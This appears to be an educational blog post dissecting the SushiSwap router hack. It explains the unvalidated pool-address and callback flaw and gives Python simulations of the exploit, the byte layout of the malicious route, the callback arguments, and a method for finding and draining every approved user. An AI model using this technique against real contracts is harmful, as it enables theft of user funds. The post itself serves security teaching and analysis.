Eating 4 Day Old Sushi - Replicating the SushiSwap Hack
Millions of dollars are commonly lost on DeFi hacks. In any other industry, this would mean lawsuits and jail time. In DeFi, as shown by the Rekt leaderboard of hacks, this is just another day.
The most recent victim was a days-old contract: a Router from the Automated Market Maker (AMM) SushiSwap. A whitehat partially saved the funds of one user, but this triggered the MEV bots and blackhats to swoop in and clear everything else out. How was this done? In this article, we will dive into the vulnerability and write a full proof of concept exploit for the security issue. Included in this post is a demo environment to tinker around with the exploit code and understand it more deeply. If you want to watch this in video form, go watch the livestream with OpenSense.
Before diving into the technical details, some context is required. My goal is to provide everything needed to understand this vulnerability with links to dive deeper, but some basic programming knowledge and some familiarity with Solidity (addresses, msg.sender, tokens, etc.) will help understand the bug in full. Have fun!
High Level Issue
Figure 1: Simplified Vulnerable Code
The SushiSwap vulnerability is complicated when looking at the system as a whole. So, Figure 1 above shows a super simple version of the exploitable contract, like you would find in a CTF.
The smart contract takes in an address as the parameter of func1(). The call sets the pool variable to the user-provided address. A different function, func2(), restricts access to its code based on the pool variable.
Since a malicious user controls the pool parameter from the previous call, an attacker can bypass the restriction to perform sensitive operations. In this case, an attacker stole funds from other users. And that's basically it! You now have a high level understanding of the bug! After the general background section, we'll get into the nitty-gritty details of how this works.
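To make the pattern concrete, here is a minimal Python sketch of the same idea. This is a toy model, not the contract from Figure 1: the class name, the balances, and the string addresses are all made up for illustration, and the caller is passed in explicitly as sender to stand in for msg.sender.

```python
class VulnerableContract:
    """Toy model: a caller-supplied address later gates a sensitive function."""

    def __init__(self):
        self.pool = None  # treated as trusted, but set from user input
        self.balances = {"victim": 100, "attacker": 0}  # made-up balances

    def func1(self, sender, pool):
        # No validation: anyone can nominate any address as the trusted pool.
        self.pool = pool

    def func2(self, sender, victim, amount):
        # The access check relies on a value the attacker chose in func1().
        if sender != self.pool:
            raise PermissionError("caller is not the pool")
        self.balances[victim] -= amount
        self.balances[sender] += amount


contract = VulnerableContract()
contract.func1(sender="attacker", pool="attacker")  # attacker names itself
contract.func2(sender="attacker", victim="victim", amount=100)
print(contract.balances)  # {'victim': 0, 'attacker': 100}
```

The check in func2() is not wrong by itself. It only becomes useless because func1() lets the caller decide what it compares against.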
AMMs + SushiSwap
Market Makers are the entities that make a market possible. A firm or individual actively quotes prices for buying or selling an asset in a given market. In traditional finance, a combination of computer algorithms and people orchestrates this process.
What if we wanted to get rid of the people behind it? The land of Decentralized Finance (DeFi) literally has Decentralized in the name. This is where Automated Market Makers (AMM) come into play. An AMM is a market maker that is fully algorithmic (automated). Using an algorithm for a market maker allows a single operation to trade assets instead of two steps (put asset for trade and purchase asset). Additionally, instead of buying/selling stocks like in traditional finance, a user can buy and sell cryptocurrency assets.
SushiSwap is a popular AMM with some other functionality, such as lending products. Other similar platforms are Uniswap and Balancer. Unfortunately, SushiSwap has a history of vulnerabilities in their code. The first vulnerability was a small oversight in the calculations between buying assets and liquidating them that allowed for an attacker to steal funds. The second group was a serious set of voting vulnerabilities that allowed for sybil (multiple identity) and vote overcounting attacks.
Ethereum is built with Ether as the currency of the platform. Generally speaking, we need a way to represent general assets as well. This could be a representation of a loan, investments in a product, or something else. In order to represent this data and make it transferable, the ERC-20 standard was created. Although it just looks like a specification for a token on top of Ethereum, ERC-20 tokens are used for much more than a representation of money.
The ERC-20 standard has various fields and functions, such as the name of the token. The relevant methods for this article are listed below:
transfer(target_address, amount): Send amount of ERC-20 token to target_address. NOTE: Transfers from the caller (msg.sender) of the function.
approve(target_address, amount): Allow target_address to spend amount of the calling user's funds. Misused approval is what this vulnerability exploits.
transferFrom(from_address, target_address, amount): Send amount of the ERC-20 token to target_address on behalf of the user from_address. An address must be allowed to do this via the approve function.
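If the relationship between these three methods is new to you, the following Python sketch models them under some simplifying assumptions. It is not a real ERC-20 implementation: accounts are plain strings, the caller is passed explicitly as sender (standing in for msg.sender), and events and return values are left out.

```python
from collections import defaultdict


class Token:
    """Simplified stand-in for an ERC-20 token."""

    def __init__(self):
        self.balance_of = defaultdict(int)
        self.allowance = defaultdict(int)  # (owner, spender) -> amount

    def transfer(self, sender, to, amount):
        # Moves the caller's own funds.
        self._move(sender, to, amount)

    def approve(self, sender, spender, amount):
        # The caller lets `spender` move up to `amount` of the caller's funds.
        self.allowance[(sender, spender)] = amount

    def transfer_from(self, sender, owner, to, amount):
        # The caller spends the owner's funds, limited by the approval.
        if self.allowance[(owner, sender)] < amount:
            raise PermissionError("insufficient allowance")
        self.allowance[(owner, sender)] -= amount
        self._move(owner, to, amount)

    def _move(self, src, dst, amount):
        if self.balance_of[src] < amount:
            raise ValueError("insufficient balance")
        self.balance_of[src] -= amount
        self.balance_of[dst] += amount


usdc = Token()
usdc.balance_of["alice"] = 100
usdc.approve(sender="alice", spender="router", amount=60)
usdc.transfer_from(sender="router", owner="alice", to="bob", amount=60)
print(usdc.balance_of["alice"], usdc.balance_of["bob"])  # 40 60
```

The important takeaway is that after approve(), the spender decides when, and to whom, the approved funds move.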
Vulnerability - Bad Input Validation
The Path of Least Resistance
According to SlowMist, the vulnerable code exists in the UniswapV3 functionality. Additionally, the mentioned entrypoint function was processRoute(). Using this knowledge, we can start from the UniswapV3 code and trace our way back up to an external call. Tracing the code is trivial to do with Ctrl+F over and over again. The call graph from processRoute() to swapUniV3 is as follows:
processRoute() takes in a few parameters including the token being traded, the amount to be traded and the expected token out. However, we only care about the slightly more complicated route parameter, which will be referred to as stream for most of the code snippets below.
The SushiSwap router has a bunch of functionality for performing trades. It allows for simple trades, sending traded funds to various pools, sending them to Uniswap, and more. Instead of having each of these be a special parameter for the function, they encoded this information in the single parameter stream. Depending on the functionality being used inside the contract, the information is encoded differently for this variable. In the source code in Figure 2, the contract takes a route and turns this into a stream. From the source code at line 6, we can see that the variable commandCode takes the first byte out of the route to decide which code path to follow. But, how do we get to the vulnerable code?
In order to save screen space, I am going to go through this fast but will include links to relevant source code. To use the processOnePool functionality, we need to specify a commandCode of 4, as shown in Figure 2. Then, processOnePool calls swap() unconditionally. Within swap, we need to specify the poolType as 1 in order to hit UniswapV3. Now, we are in the UniswapV3 trading function.
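The dispatch described above can be modeled roughly as follows. This is a Python sketch of the control flow only, not the router's Solidity: the Stream class and trace_route() are hypothetical names, every command code and pool type other than the ones on our path is ignored, and the field order follows the route layout used later in this article.

```python
class Stream:
    """Hypothetical byte reader that consumes exactly as many bytes as each type needs."""

    def __init__(self, data: bytes):
        self.data = data
        self.pos = 0

    def read_uint8(self) -> int:
        value = self.data[self.pos]
        self.pos += 1
        return value

    def read_address(self) -> str:
        raw = self.data[self.pos:self.pos + 20]
        self.pos += 20
        return "0x" + raw.hex()


def trace_route(route: bytes) -> list:
    """Return the functions a route would pass through on the way to swapUniV3."""
    stream = Stream(route)
    path = []
    command_code = stream.read_uint8()  # first byte picks the code path
    if command_code != 4:
        return path  # other command codes are out of scope for this sketch
    path.append("processOnePool")
    stream.read_address()  # tokenIn, not interesting for the exploit
    path.append("swap")  # called unconditionally
    pool_type = stream.read_uint8()
    if pool_type == 1:
        path.append("swapUniV3")
    return path


route = bytes([4]) + bytes(20) + bytes([1])
print(trace_route(route))  # ['processOnePool', 'swap', 'swapUniV3']
```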
UniswapV3 Functionality Vulnerability
Figure 3: UniswapV3 Handler Code
In Figure 3 above, we have the code for the UniswapV3 function. First at lines 4-6, it is reading in more information from the stream. In particular, it is reading in the pool address to use for Uniswap at line 4 and the address to send the funds to at line 6. Finally, it calls the Uniswap pool in order to trade our input token for our intended output token at line 9. What's the lastCalledPool = pool code on line 8 in Figure 3 doing? Remember this variable for the next section :)
A popular sink to look for in smart contracts for security issues is an unverified external contract call. This is where our security vulnerability lies! The pool address is never verified to be a proper UniswapV3 pool in this entire flow. In this case, it's not just ANY call: there is inherent trust in this functionality. If we can exploit this trust, we may be able to pwn this contract.
Figure 4: UniswapV3 Callback Function
Uniswap requires a callback to transfer funds from the calling contract. This is a design decision to never require an approve() call on the contract itself. After the call to the UniswapV3 pool, this function in Figure 4 will be triggered to transfer funds to Uniswap. This callback function is highly trusted functionality within the application. What does the callback function do in this case?
First, this code validates that the msg.sender (address making the call) is the same as the previously called pool on line 6 of Figure 4. From Figure 3, this is the reason that lastCalledPool = pool is set. We want to perform access control on the callback uniswapV3SwapCallback! The caller is checked against lastCalledPool, which is supposed to hold the external UniswapV3 pool (Figure 3), to ensure this cannot be abused. If anybody could call this function, then all users who approved the contract could have had their funds taken. After this on line 8, the contract decodes the parameters tokenIn and from. Finally, the ERC-20 token is transferred from one account to another using transferFrom() on line 15.
If we look at the code a little harder and remember our background on ERC-20, the transferFrom() function is sending funds on behalf of another user. Prior to executing processRoute(), the caller of the contract is expected to have called approve() for the token to allow the SushiSwap router to spend funds on the caller's behalf. The transfer must happen in the UniswapV3 callback, since we would have approved the router to transfer funds and not the UniswapV3 pool.
Bringing the Knowledge Together
From the previous two sections, we know two things:
The pool address is controlled via the stream parameter without any verification on a UniswapV3 call.
uniswapV3SwapCallback() allows the most recently called pool to make the router transfer funds from an arbitrary user who has approved the router.
Putting this all together, there's a horrible exploit to steal user funds:
An attacker can provide their own malicious contract as the pool address.
swap() will be called on the malicious pool address that is provided.
Since uniswapV3SwapCallback() can be called by the in-progress pool, the malicious contract can make the router call transferFrom() on any user that has approved the router contract. TL;DR: stolen funds!
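The three steps above can be played out end to end in a small Python simulation. Treat it as a sketch under stated assumptions rather than the real contracts: Token, Router, and MaliciousPool are hypothetical stand-ins, accounts are plain strings, the callback takes already-decoded arguments, and I am assuming the transferred tokens go to the calling pool.

```python
class Token:
    """Minimal ERC-20 stand-in: balances plus (owner, spender) allowances."""

    def __init__(self, balances):
        self.balances = dict(balances)
        self.allowances = {}

    def approve(self, owner, spender, amount):
        self.allowances[(owner, spender)] = amount

    def transfer_from(self, spender, owner, to, amount):
        allowed = self.allowances.get((owner, spender), 0)
        if amount > allowed or amount > self.balances.get(owner, 0):
            raise PermissionError("transferFrom rejected")
        self.allowances[(owner, spender)] = allowed - amount
        self.balances[owner] -= amount
        self.balances[to] = self.balances.get(to, 0) + amount


class Router:
    def __init__(self):
        self.last_called_pool = None

    def swap_uni_v3(self, pool):
        # `pool` comes from the attacker-supplied route and is never validated.
        self.last_called_pool = pool
        pool.swap(self)

    def uniswap_v3_swap_callback(self, caller, amount, token, from_user):
        # The only access control: the caller must be the pool we just called.
        if caller is not self.last_called_pool:
            raise PermissionError("caller is not the last called pool")
        # Assumption: the tokens are sent to the calling pool.
        token.transfer_from("router", from_user, caller.name, amount)


class MaliciousPool:
    name = "attacker"

    def __init__(self, token, victim, amount):
        self.token, self.victim, self.amount = token, victim, amount

    def swap(self, router):
        # Instead of trading, immediately call back into the router.
        router.uniswap_v3_swap_callback(self, self.amount, self.token, self.victim)


usdc = Token({"victim": 1000})
usdc.approve("victim", "router", 1000)  # the victim once approved the router
router = Router()
router.swap_uni_v3(MaliciousPool(usdc, "victim", 1000))
print(usdc.balances)  # {'victim': 0, 'attacker': 1000}
```

Note that the victim never takes part in the attacking transaction. The earlier approval is all that is needed.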
Crafting an Exploit
Woah. We now see there is a vulnerability in the code above that can steal user funds. Any user who has called approve() for the router can have all of their approved funds stolen. This is because we can call transferFrom() with an arbitrary user from the context of the contract. So, let's write a proof of concept exploiting this bug with the knowledge discussed above.
In order to run this exploit, we will need an environment to test it in. Clearly, testing this on mainnet Ethereum is a bad idea. I've set up a test environment to perform this attack on GitHub. The setup uses Hardhat as the development framework. We will fork the chain directly (configured in the hardhat.config.js file) from a point prior to the hack. While running this fork, we have almost infinite money we can play around with as well.
In the real exploit, real user funds were taken. In our case, it is easier to fake this by creating a user and adding the approvals to the router contract. In order to do this, we will need a second smart contract that will get the funds for a token and make an approval for these tokens to the SushiSwap router. I chose USDC as the token to exploit. To get the funds, an exchange (Uniswap) can be used to programmatically trade ETH for USDC with functions like swapExactETHForTokens. This is out of scope for this article but the demo has a working example.
Crafting a Fake Route
Figure 5: Malicious Route Setup
With our fake victim configured, we can now write our exploit payload. In order to do this, we will craft a fake stream that will trigger a call to a smart contract that we control. How is the route encoded? From before, we know this is encoded using the ABI to put the data into bytes.
In the section The Path of Least Resistance above, we traced the code in order to find the proper values to use. If you follow the code path, the stream (shown as route in many cases), uses 6 values:
CommandCode: To use the processOnePool command code, set this uint8 to 4.
TokenIn: The token being used as the initial trade. This is an address (20 bytes). We don't care about the value.
PoolCode: To reach the swapUniV3 function, set this uint8 pool type to 1.
Pool Address: The smart contract being used for exploitation. This should implement the swap() function, which will be discussed later.
zeroForOne: A uint8 value that stores a boolean. Don't care about the value of this.
Recipient Address: An address for the receiver of funds from Uniswap. Since it's not really calling Uniswap, we don't care about this value, as long as it's an address.
Now that we know all of the values, let's encode it! Initially, I thought to encode this using the abi.encode() function. However, the exploit failed because it couldn't find the pool. Why? There are two ABI (Application Binary Interface) encoding functions: abi.encode() and abi.encodePacked(). First, abi.encode() puts every non-dynamic data type into 32 bytes, regardless of its size. Second, abi.encodePacked() will represent every data type with the fewest bytes possible. For instance, uint8 will take up a single byte. Upon looking into the library for parsing the stream, it was apparent that abi.encodePacked() should be used because the parser was not incrementing in groups of 32 bytes; it was incrementing by the size of the type.
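To see why the choice of encoding matters, here is a small Python sketch that mimics both layouts for the six route fields. It only handles uint8 and address, the two types the route uses, and the three addresses are obvious placeholders rather than real contracts.

```python
def encode_packed(fields):
    """Mimic abi.encodePacked() for uint8 and address: no padding at all."""
    out = b""
    for kind, value in fields:
        size = 1 if kind == "uint8" else 20
        out += value.to_bytes(size, "big")
    return out


def encode_padded(fields):
    """Mimic abi.encode() for static types: every value fills a 32-byte word."""
    return b"".join(value.to_bytes(32, "big") for _, value in fields)


# Placeholder addresses, stored as integers for easy byte conversion.
TOKEN_IN = int("11" * 20, 16)
POOL = int("aa" * 20, 16)
RECIPIENT = int("22" * 20, 16)

route_fields = [
    ("uint8", 4),            # commandCode: processOnePool
    ("address", TOKEN_IN),   # tokenIn
    ("uint8", 1),            # poolType: UniswapV3
    ("address", POOL),       # attacker-controlled pool
    ("uint8", 0),            # zeroForOne
    ("address", RECIPIENT),  # recipient
]

packed = encode_packed(route_fields)
padded = encode_padded(route_fields)
print(len(packed), len(padded))  # 63 192

# A parser that advances by type size expects the pool at byte 1 + 20 + 1 = 22.
pool_offset = 22
print(packed[pool_offset:pool_offset + 20].hex())  # 40 hex characters of 'a'
print(padded[pool_offset:pool_offset + 20].hex())  # mostly zero padding
```

With the padded layout, the parser reads padding bytes where it expects the pool address, which matches the "couldn't find the pool" failure I ran into.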
With this, we know how to build the route stream for the exploit! The rest of the parameters on the call require a valid ERC-20 token for the addresses but they are not relevant to the exploit. Besides this, nothing else matters. The code for this is shown above in Figure 5.
Hitting the Callback Function
Figure 6: Calling the Uniswap Callback
The Pool address from the route is our attacker contract. So, we need to implement swap() in our attacker contract in order to hijack the control flow. For simplicity, I wrote a smart contract to call processRoute() then added swap() to this contract as well.
Once swap() has been called, we may execute the function uniswapV3SwapCallback() and steal the user's funds. This is only possible because lastCalledPool is now set to our contract. This function requires three parameters:
amount0Delta: The amount of token 0 that was sent.
amount1Delta: The amount of token 1 that was sent.
data: Information for the request. This is abi encoded and breaks down into two elements:
tokenIn: The ERC-20 token address to steal from. Victim token address goes here.
from: The address of the user to take the tokens from. Victim user address goes here.
In practice, we only need to provide a large positive value for amount0Delta. If we do this, then this parameter acts as the amount of funds to transfer. Since we want to steal the maximum amount of funds, we will set this to be the highest possible value for a given victim. This value depends on the amount of funds they have available and the amount they approved the router to spend.
The from parameter within the callback data should be our victim who we want to steal the funds from. The tokenIn should be the address of the token we're trying to take from the user. For this example, I've set up USDC. The code for this entire function call is shown above in Figure 6.
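As a rough illustration of what those callback arguments look like on the wire, the Python sketch below builds and decodes the data blob. It assumes data is a standard ABI encoding of two addresses, so each one is left-padded to a 32-byte word. The helper names and both addresses are placeholders, and passing 0 for amount1Delta is my own assumption since only amount0Delta matters here.

```python
def abi_encode_addresses(*addresses):
    """Encode addresses the way abi.encode() would: 12 zero bytes, then 20 address bytes."""
    return b"".join(bytes(12) + bytes.fromhex(addr[2:]) for addr in addresses)


def abi_decode_addresses(data):
    """Inverse of abi_encode_addresses(): take the low 20 bytes of each 32-byte word."""
    return ["0x" + data[i + 12:i + 32].hex() for i in range(0, len(data), 32)]


def build_callback_args(token_in, victim, amount):
    """Return (amount0Delta, amount1Delta, data) for the callback."""
    if amount <= 0:
        raise ValueError("amount0Delta must be positive to act as the transfer amount")
    return amount, 0, abi_encode_addresses(token_in, victim)


TOKEN = "0x" + "11" * 20   # placeholder for the victim token address
VICTIM = "0x" + "22" * 20  # placeholder for the victim user address

amount0_delta, amount1_delta, data = build_callback_args(TOKEN, VICTIM, 1_000_000)
print(len(data))  # 64
print(abi_decode_addresses(data) == [TOKEN, VICTIM])  # True
```

Unlike the route, this blob uses the padded layout, so mixing up the two encodings breaks the exploit in either direction.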
Poof Goes the Money
All we have to do is deploy the contract, call our attacker function and steal the money from the user. The full exploit code can be found at mdulin2/sushi_swap_expliot_2023. Game over!
Figure 7: Exploit Video PoC
While writing this blog post, I was asked by mis4nthr0pic to give a talk within the OpenSense discord channel. So, I decided to talk about this vulnerability but with a slight twist: exploit all users that were vulnerable. Now, this exploit is exactly the same as before except that we cannot hardcode users or tokens; we need to do this dynamically. A link to this talk can be found HERE once it is put on YouTube.
To find the exploitable users, I wrote up a script that uses a combination of Etherscan and ETH-RPC. Here is how this was done:
Parse all of the transfer events from previous executions of the router contract. In particular, log the user's address in the from parameter and the token being traded.
Find the amount that can be stolen. This is the smaller of the approved funds the router can spend (allowance) and the balance in the wallet. This is done by calling the ERC-20 token contracts directly to check.
Steal the funds! Run the exploit for every user address discovered above.
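The amount calculation in the steps above boils down to a min() per user and token. Here is a Python sketch of that filtering step. It works on already-fetched numbers instead of talking to Etherscan or an RPC node, and the record layout, names, and values are all made up for illustration.

```python
def stealable_amount(balance, allowance):
    """The router can move at most the smaller of the balance and the allowance."""
    return min(balance, allowance)


def build_targets(observations):
    """Map (user, token) to the amount that could be taken, skipping empty targets."""
    targets = {}
    for obs in observations:
        amount = stealable_amount(obs["balance"], obs["allowance"])
        if amount > 0:
            # A dict key per (user, token) also removes duplicate observations.
            targets[(obs["user"], obs["token"])] = amount
    return targets


# Hypothetical data, as if gathered from transfer events plus balance/allowance lookups.
observations = [
    {"user": "0xalice", "token": "USDC", "balance": 500, "allowance": 2**256 - 1},
    {"user": "0xbob", "token": "USDC", "balance": 900, "allowance": 100},
    {"user": "0xcarol", "token": "WETH", "balance": 0, "allowance": 2**256 - 1},
    {"user": "0xalice", "token": "USDC", "balance": 500, "allowance": 2**256 - 1},
]

for (user, token), amount in build_targets(observations).items():
    print(user, token, amount)
```

A user with a huge allowance but an empty wallet is not exploitable, and neither is a full wallet with no allowance left, which is why both values need to be checked.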
There may have been other users who approved the router. However, I found searching for previous executions of the contract to be the easiest way to find exploitable users. The code for this can be found here. For a full PoC video of finding all the users and exploiting them, go here.
Initially, this vulnerability was found by the respected security auditor Trust. They contacted SushiSwap through Immunefi, who only said they were working on it, as HYDN had already detected this issue. User funds are at risk though!? Afraid that a blackhat could exploit this at any moment, Trust performed a whitehat hack in order to recover the funds of the user with the most funds at risk. As soon as this happened, a trove of MEV bots swooped in and stole the rest of the funds. Yikes! The dark forest is real. HYDN did manage to recover a large amount of funds though.
Trust was hit with some serious backlash after this. Why? When this initially happened, two tweets were made: I whitehat hacked 0xsifu and MEV bots stole the rest of it. Without the context of talking to SushiSwap, this looked pretty bad. Under these sorts of conditions, what would you have done?
If you wait too long to write the perfect POC, then somebody else may have stolen the money. If you do nothing, then the funds will likely be stolen. Additionally, the contract was not upgradeable and didn't have pause functionality either. To me, there is no right answer here. Trust was only trying to help by securing user funds. Although SushiSwap wrote buggy (and likely unaudited) code, writing secure code is really difficult to do. Please get audits on all code getting released. In the future, some standards/guidance on when a whitehat hack is acceptable would help everyone avoid these types of situations. Thanks for all you do Trust!
Please go through the proof of concept locally and debug this exploit. The best way to get better at hacking is to simply hack over and over again. If you're really up for a challenge, I believe that the swapTridentCL function suffers from the same vulnerability as the Uniswap implementation did. Implementing this exploit yourself would be an awesome exercise (it should be noted that I never tried exploiting this though; it just looks like the same pattern to me)! Overall, I thought this was a relatively simple vulnerability that helped me learn more about the DeFi ecosystem. Like a lot of people, I am still learning all about this.
Thanks for joining me in my understanding of the most recent SushiSwap hack. I hope you found this interesting and learned from the DeFi security discussions. Thanks to Trust for finding the bug, SlowMist for publishing the first sane tweet on the issue and both Nathan Peercy and Nathan Kirkland for reviewing this article. Feel free to reach out to me (contact information is in the footer) if you have any questions or comments about this article or anything else. Cheers from Maxwell "ꓘ" Dulin.